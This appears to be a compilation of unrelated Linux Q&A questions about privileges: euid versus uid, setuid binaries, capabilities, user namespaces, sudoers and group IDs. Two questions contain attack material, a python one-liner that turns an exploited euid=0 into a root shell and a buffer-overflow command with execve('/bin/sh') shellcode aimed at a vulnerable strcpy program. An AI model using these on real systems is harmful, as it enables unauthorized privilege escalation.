What exactly is happening here? root@bob-p7-1298c:/# ls -l /tmp/report.csv && lsof | grep "report.csv" -rw-r--r-- 1 mysql mysql 1430 Dec 4 12:34 /tmp/report.csv lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/1000/gvfs Output information may be incomplete.

So here is the situation. I have a hypothetical system with 2 users - 'user1' and 'root'. The user 'user1' is just a normal non-sudoer user with uid=1000, and the root, is just a normal root user with uid=0. Let's say that through a certain exploit in the system user1, can get euid=0, but his uid still remains 1000. This sort of gives him some root abilities but not all. For example: accessing /root, is done as if the root is attempting to do it, but running 'sudo' or 'su' seems to be ran as if based on UID and not EUID. My question is: Is there an elegant way that doesn't require, uploading binaries, changing /etc/shadow or /etc/passwd to switch the uid to 0 as well, now that we have euid=0? It would also be great if the method works natively and doesn't assume that specific programs like gcc, for example, exsist. So far I only managed to think out

-c 'import pty; import os; os.setuid(0); pty.spawn("/bin/bash")'

which is fairly nice, but assumes that there is python installed on the system. Any better suggestion?

**Background:** I have written a Java program to capture network packets. The code uses a wrapper API around libpcap and works nicely – as long as I run the program via **sudo**. I am now trying to figure out how to set up things so that I can run the program as a "regular" user. Ultimately, it will be run on a system where I **do not** have sudo privilege. After some investigation, a possible solution has been found that involves setting capabilities that provide privileged access in a specific way. Part of this involves setting the capabilities CAP_NET_RAW and CAP_NET_ADMIN to ei (e.g., sudo setcap 'CAP_NET_RAW=ei CAP_NET_ADMIN=ei' program). **The Problem:** So, I have done this for the java command on my system. Unfortunately, this has created a problem (which has been asked about by many in various forums) where, when java is invoked, the following message is displayed: >java: error while loading shared libraries: libjli.so: cannot open shared object file: No such file or directory This library does indeed exist and shows up in the list of libraries for the java command.

$ sudo find / -name libjli.so -print
/opt/jdk1.7.0_79/lib/amd64/jli/libjli.so
/opt/jdk1.7.0_79/jre/lib/amd64/jli/libjli.so
/usr/java/jdk1.7.0_79/lib/amd64/jli/libjli.so
/usr/java/jdk1.7.0_79/jre/lib/amd64/jli/libjli.so
/usr/lib/jvm/java-1.6.0-openjdk-1.6.0.35.x86_64/lib/amd64/jli/libjli.so
/usr/lib/jvm/java-1.6.0-openjdk-1.6.0.35.x86_64/jre/lib/amd64/jli/libjli.so

$ which java
/usr/bin/java

$ ls -l /usr/bin/java
lrwxrwxrwx. 1 root root 22 Jun 22  2015 /usr/bin/java -> /etc/alternatives/java

$ ls -l /etc/alternatives/java
lrwxrwxrwx. 1 root root 25 Jun 22  2015 /etc/alternatives/java -> /opt/jdk1.7.0_79/bin/java

$ ls -l /opt/jdk1.7.0_79/bin/java
-rwxr-xr-x. 1 uucp 143 7718 Apr 10  2015 /opt/jdk1.7.0_79/bin/java

$ ldd /usr/bin/java
	linux-vdso.so.1 =>  (0x00007fff3f3fa000)
	libpthread.so.0 => /lib64/libpthread.so.0 (0x0000003150c00000)
	libjli.so => /usr/java/jdk1.7.0_79/lib/amd64/jli/libjli.so (0x00007ff56d563000)
	libdl.so.2 => /lib64/libdl.so.2 (0x0000003151000000)
	libc.so.6 => /lib64/libc.so.6 (0x0000003150800000)
	/lib64/ld-linux-x86-64.so.2 (0x0000003150400000)

BTW, I am using the Java 7 JDK, not the OpenJDK. So, what's wrong here? Everything seems to be in place, yet it can't find what it needs. Does the fact that there are two versions of Java on the machine have anything to do it? Is there some other weird situation? Based on my searches, this problem has been encountered by many, but I couldn't seem to find a reason, nor a solution. Can anyone help with this? **UPDATE #1** Well, after a little more investigating, it appears that the problem is due to a "feature" in Java. The link below includes another link that gets to heart of the matter. Problem to launch java at Debian: “error while loading shared libraries: libjli.so” with the embedded link Why setuid java programs don't work . Based upon what I read in these, it would seem that running java with specific capabilities enabled is not allowed. Perhaps that will change at some point, with an improvement to Java security. If anyone knows about this, or more importantly, knows that a solution has been provided, please comment.

I'm trying to understand whether it's possible to map two users from a **user namespace** to two different users on the host. The goal is to replicate the same permissions I have on my host inside a rootfs (Ubuntu base, because I'm trying to build a container from scratch). For example: - Everything under / should belong to root. - /home/user should belong to the regular user. To achieve this, I was thinking of using UID mapping in a user namespace, something like:

UID in user namespace      ---> UID on host
      1000 (admin)         ->       0 (root)
      1001 (bob)           ->    1001 (bob)

Is this kind of mapping even possible? Here’s what I’ve already tried: - Running echo -e "1000 0 1\n1001 1001 1" > /proc/[PID]/uid_map to define the mapping, but I get an error. - Trying to manually modify /proc/[PID]/uid_map using newuidmap for each user. However, I’ve never been able to map more than one user, and I can’t seem to map UID 0 (root) at all. I’ve read the man pages and followed the constraints mentioned there, but I’m still getting error messages. For example:

# terminal 1

unshare --user bash
echo $$ # 11591

# terminal 2 as user 'alex' (uid = 1000)

newuidmap 11591 0 0 1
# newuidmap: uid range [0-1) -> [0-1) not allowed

newuidmap 11591 1001 1001 1
# newuidmap: uid range [1001-1002) -> [1001-1002) not allowed

These commands fail, even when run with sudo. I also tried mapping to subuids that I’ve declared, but it still doesn’t work:

cat /etc/subuid

alex:100000:65536
root:200000:65536
self:300000:65536

cat /etc/subgid

alex:100000:65536
root:200000:65536
self:300000:65536

I managed to resize my LVM partitions, set up my swapfile, and disable secure boot, so now I can hibernate with sudo systemctl hibernate. However, I want to be able to hibernate from my power menu (wlogout) without needing to use sudo. The systemctl commands suspend, reboot, and poweroff all work without needing sudo. Why does hibernate require sudo, and is there a way to drop it, so I don't need to interact via the command line for this one power option? Using: - Ubuntu 24.04 LTS - Sway WM (not GNOME)

The following links discuss these concepts in different contexts. I have read their definitions, but I still can't tell how they are related, or if some of them are just the same. * Current group ID * Group ID * Primary and supplementary group IDs * Effective and real group IDs (also on Wikipedia ) ### Here is one example of the source of my confusion: According to man id , if I type id, I should get what they call **effective** and **real** group IDs. id uid=501(joe) gid=501(joe) groups=501(joe), 100(users) However, Wikipedia refers to the output of id to distinguish between **primary** and **supplementary** IDs. Moreover, Wikipedia distinguishes between **primary** vs **supplementary** and **effective** vs **real** group ids. How do these concepts relate to each other? Also, is it true that **primary** group ID = **group ID** = **current** group ID?

In Solaris, I believe that you can assign privileges to users, and in Linux you can assign capabilities to executable files. Does some or all BSD flavors have privileges or capabilities, or something of this nature? Or do they follow the "all or nothing" approach where the root user have full privileges while the other users have very few privileges?

**Objective** : Run a program as root (C++ binary). The same as : https://unix.stackexchange.com/questions/359598/setuid-bit-not-working-in-ubuntu And : https://unix.stackexchange.com/questions/150972/why-setuid-does-not-work-on-executable ./a.out output: `E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied) E: Unable to lock the administration directory (/var/lib/dpkg/), are you root? psurana //output for "whoami" Look below for the code. ` ls -l output: -rwsrwxr-x 1 root root 46136 Jun 7 20:13 a.out The Code : #include #include int main(int argc, char *argv[]){ std::string input = "apt-get install " + std::string(argv); system(input.c_str()); system("whoami"); return 0; } **Details:** : compiled the program and then did chown root:root a.out && chmod u+s a.out. Please look above for ls -l output. I still do not get the root privileges and the output for system("whoami") in the code is my own username on the machine. Reading the two linked questions did not yield me anywhere. :(. both the creator and the owner of the file are root. The setuid bit is set, so it should work. The filesystem is not external either, it is my own machine. How can I make this work?

pkexec is not installed by default on Debian unlike runuser which is. So far I've been using pkexec but discovered there is also runuser, and since runuser seems to be more advanced (looking at options in man entry which I don't fully understand and didn't use the command yet) so this made me think whether there is any benefit to install pkexec since runuser is already there. What pros and cons does runuser have compared to pkexec?

I have scheduled a system reboot every night in my crontab with this line: 0 4 * * * /sbin/shutdown -r +5 I would like to be able to log in and cancel the reboot if I need the system to stay up at this time, but I need to log in before 4:00 to run shutdown -c after 4:00, because if i try to ssh after 4:00 it shows me a massage that only privileged users are allowed to sign in when a shutdown is scheduled. How can I privilege my user to be able to ssh login after 4:00 to cancel the reboot at 4:05? I guess there is some easy trick to do so but I am new to linux and currently learn everything and I don't find a solution on the internet.

I saw this statement at the end of [this answer](https://unix.stackexchange.com/a/256530/495409) : > PS: I have no idea why rfkill works when run as an unprivileged user. On my Mint, it doesn't have a setuid or setgid bit. I was curious, and looked on my Arch system. Here's what sudo and rfkill look like on my system. File sizes and dates have been omitted. It looks like there's no setuid bit on rfkill (there is one on sudo, for comparison).

$ /usr/bin/env ls -lah $(which sudo) $(which rfkill)
-rwxr-xr-x 1 root root [OMITTED] /sbin/rfkill
-rwsr-xr-x 1 root root [OMITTED] /sbin/sudo

Interestingly, running rfkill to disable & enable wireless access works [as described here](https://unix.stackexchange.com/a/256530/495409) , *even though I'm running rfkill from my account (i.e., not as root and not with sudo or similar)*. How does rfkill not require root, as typically commands that enable/disable hardware need to be ran with root privileges?

I'm trying to exploit the following code:

#include 
#include 

int main(int argc, char** argv){
    char buffer;
    strcpy(buffer, argv[1] );

    return 0;
}

with the following command

./vuln $(python -c "import sys; sys.stdout.buffer.write(b'\x90'*60 + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + b'\x40\xd6\xff\xff'*6)")

The first part is the NOPs, the second part is the shell code I took from this website , and it should just execve("/bin/sh").  The last part is the return address.  My program is compiled for a 32-bit system, and with all protection mechanisms disabled.  When I run my script, I get

process 15377 is executing new program: /usr/bin/bash

meaning bash is being run as the current user and not as root.  Where can I find a shell code that runs a shell as root?  Do I have to disable any Linux feature that prevents this? When I run whoami I get the current user and not root.  In this “First Exploit! Buffer Overflow with Shellcode – bin 0x0E” video the same script is used, and root access is granted.

I've had some issues with my XQuartz environment not starting due to a bit of a freak reason that was a rather hard to figure out. It's (mostly) working again but I must have caused another regression during my various troubleshooting attempts. Applications like epiphany, gtk3-demo-application and even zenity --calendar used to start just as you'd expect. Now, they abort because of a BadAccess that apparently occurs through the XCreatePixmap call under gdk_x11_window_set_icon_list. Strange, because I don't see that as a possible error for XCreatePixmap. Even stranger: it does **not** happen if I start these applications with DISPLAY=hnam.local:0 (or even unix:0!) rather than just DISPLAY=:0. From what I know this makes the connection go through the TCP/IP stack. Acceptable as a workaround as the performance/functionality loss is probably moot under XQuartz but I'd still like to understand what's up here. I'm suspecting that it's got something to do with the fact that I did use the privileged_startx wrapper that is normally enabled for XQuartz users and is responsible for setting up the directories under /tmp. I disabled that years ago for reasons I cannot recall, but re-enabled during my troubleshooting. It's disabled again, and since I did that there's another strange phenomenon. I can start the offending applications like before just after launching my X11 environment. A couple of minutes later they will again throw a BadAccess on start. Or maybe I can start them just once which will trigger whatever causes the BadAccess on subsequent starts. EDIT: but see below *) I had X11 configured (and hopefully have, again) to allow connections from remote servers in my LAN. I also always do a xhost +x because there's no reason for any tighter form of connection control. During my troubleshooting I also caused a brief issue with my .Xauthority file (got owned by root), which I fixed by re-owning it and running xauth -b. Do the above symptoms ring any bells? Could they be related to what's in those directories under /tmp or to something fishy in my .Xauthority file? It seems rather weird that operations would violate rules when performed from the most local kind of connection but not from remote connections, no? Thanks! EDIT: I have a hunch of the direct reason, but still no explanation why this has started happening. My X11 session is "anchored" by an xfce4-panel. It looks like the offending XCreatePixmap call might be targetting a drawable that's owned by that panel process, e.g. to install the application icon in the panel's "window button". It would make sense to do this only if the 2 XDisplay strings are identical. That could explain why I can also avoid the error with DISPLAY=unix:0 (AFAIK that's equivalent to DISPLAY=:0). As I said, I still can't fathom why this worked before, and even less why it now works for a limited amount of time. EDIT: it also seems I misinterpreted what xwininfo showed me. I've cobbled together an XIOErrorExitHandler that checks an env. variable to know it an attempt should be made to continue. That seems to work. EDIT: running e.g. sudo zenity --calendar also doesn't throw a BadAccess which again points in the direction of a file that no longer has the correct permissions. *) EDIT: and the weirdest observation of all: there is in fact no actual delay; the time aspect was introduced by me postponing one of my usual operations: moving the initial terminal windows to the desired screen (if it's attached) and height-maximising them via the WM (xfwm4). Changing the height of 1 of these 2 windows (belonging to separate Konsole5 instances) triggers the issue *and it goes away if I restore that window's initial height*. If I close the window the trigger action moves to the other window. Annoyingly I cannot find any indication what request_code 133 stands for.

After apt-get install chromium and running it on Debian 12, ps alx | grep -e ^F -e ^5.*chromium returns:

F   UID     PID    PPID PRI  NI    VSZ   RSS WCHAN  STAT TTY        TIME COMMAND
5  1000 3452315 3452313  20   0 33884428 16712 do_sys S  ?          0:00 /usr/lib/chromium/chromium --type=zygote --crashpad-handler-pid=3452306 --enable-crash-reporter=,built on Debian 12.4, running on Debian 12.4 --change-stack-guard-on-fork=enable

This executed on LUbuntu 18 after apt-get install chromium-browser (which does snap install chromium in its /var/lib/dpkg/info/chromium-browser.preinst):

F   UID     PID    PPID PRI  NI    VSZ   RSS WCHAN  STAT TTY        TIME COMMAND
5  1000  197953  197951  20   0 33909972 1228 do_sys S   ?          0:00 /snap/chromium/2729/usr/lib/chromium-browser/chrome --type=zygote --crashpad-handler-pid=197944 --enable-crash-reporter=,snap --change-stack-guard-on-fork=enable

where the flag F value 5 means _used super-user privileges_ according to man ps. **Why does the Chromium browser need and get super-user privileges when installed by the regular package management and run by a non-privileged user ?** ChatGPT says this would be for installation or updating, but I don't believe that because I did installation using regular apt-get and updates would be done by unattended-upgrades on Debian or snapd on Ubuntu.

Can someone please explain the set-user-ID mechanism in Unix ? What was the rationale behind this design decision? How is it different from effective user id mechanism ?

Let's say I have two users. One is admin and has sudo privileges and one is a regular user. Regular user runs a process and admin want's to see the process logs without using sudo. How to achieve this? I also tried to add admin into adm and systemd-journal and while the the error message about not seeing other users and system logs disappeared, the logs still don't show. Process writes into /var/log/journal dir stat: Size: 4096 Blocks: 8 IO Block: 4096 directory Device: 803h/2051d Inode: 17039878 Links: 2 Access: (0755/drwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2022-11-03 21:45:05.578697401 +0100 Modify: 2022-10-17 22:40:23.353619074 +0200 Change: 2022-10-17 22:40:23.353619074 +0200 Birth: -

I have created a user. useradd -M -d /usr/my_user my_user chown -R my_user. /usr/my_user Now as a root I can type: su - my_user -c /usr/my_user/some_dir/script.sh but if I want to do more complicated things, for example navigate between **my_user** folders I have to type the su - my_user pattern every time. Otherwise it states that I do not have permissions. How can I make my life easier and not type the su every time?

Following this solution, I want to grant to the user daemon the execution of /bin/date. Here what I did: 1. find the user that apache2 uses when spawning:

# ps | grep httpd
    252 root     /usr/bin/httpd -k start
    260 daemon   /usr/bin/httpd -k start
    262 daemon   /usr/bin/httpd -k start
    264 daemon   /usr/bin/httpd -k start
    467 root     grep httpd
2. find the right path for date:

# which date /bin/date 3. using visudo add the following lines:

Cmnd_Alias DATE=/bin/date                                               
    daemon ALL=NOPASSWD: DATE
4. reboot

5. test the new privileges:

# sudo -u daemon date -s "2023-09-09 10:16:00" date: can't set date: Operation not permitted Sat Sep 9 10:16:00 UTC 2023 Is there anything wrong in my syntax? I also tried with: ALL ALL=NOPASSWD: DATE but it's the same. It's a Buildroot environment.

I'm not going to add sudo in my Buildroot environment for RPi 3 B+ since I just need apache2 to update my system time with date -s TIME. Is there a way to grant this permission without installing and configure sudo?

Suppose I change some user settings like its initial login group or add it to a new group. I now can do su user and work with these new settings. But all the previously running processes will still have the same permissions as before. How can I force a specific running process to re-read /etc/passwd and /etc/group to reinitialize its user and group settings, without terminating any activity it was doing? I've tried attaching to the process with gdb and do print setuid(MY_USER_ID), but despite the result was 0 (i.e. success), the process still remained with the same data (checked on bash running groups to see whether additional group has appeared).